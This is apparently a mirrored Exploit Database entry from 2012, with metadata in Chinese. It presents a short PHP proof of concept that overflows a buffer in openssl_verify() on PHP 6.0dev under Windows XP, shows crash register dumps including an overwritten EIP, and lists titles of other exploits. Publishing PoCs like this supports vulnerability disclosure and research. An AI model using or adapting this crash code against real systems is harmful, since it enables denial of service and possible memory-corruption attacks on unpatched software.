PHP 6.0 – ‘openssl_verify()’ Local Buffer Overflow (PoC)

Exploit Database
19 阅读

作者： Yakir Wizman

日期： 2012-07-20
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/19963/

<?php
// ==================================================================================
//
// PHP 6.0 openssl_verify() Local Buffer Overflow PoC
//
// Tested on WIN XP, Apache, PHP 6.0dev. Local Buffer Overflow.
//
// Local Buffer Overflow
// Author: Pr0T3cT10n <pr0t3ct10n@gmail.com>
//
// ==================================================================================
//
// REGISTERS:
// EAX 000003D0, ECX 00BBDB28, EDX 00BBDAD8
// EBX 00BBC940, ESP 0012FB5C UNICODE "AAA...."
// ESI 00BBC940, EDI 00831D00, EBP 0012FBF0 UNICODE "AAA...."
// EIP 00410041
//
// ==================================================================================

$buffer = str_repeat("A", 1000);
openssl_verify(1,1,$buffer);
?>

last Exploits
PHP 6.0 – ‘openssl_verify()’ Local Buffer Overflow (PoC)的更多信息

WPS Office < 2016 - '.xls' Heap Memory Corruption：
BlueAuditor 1.7.2.0 – ‘Name’ Denial of Service (PoC)：
IrfanView 4.28 – ‘.ICO’ Without Transparent Colour Denial of Service / Remote Denial of Service：
Microsoft Internet Explorer 9 – Cross-Site Scripting Filter Bypass：
Allok Video Splitter 3.1.12.17 – Denial of Service：
Advanced Encryption Package – Buffer Overflow (Denial of Service) (PoC)：
AbsoluteTelnet 11.24 – ‘Phone’ Denial of Service (PoC)：
httpdx 1.5.2 – Remote Denial of Service (PoC)：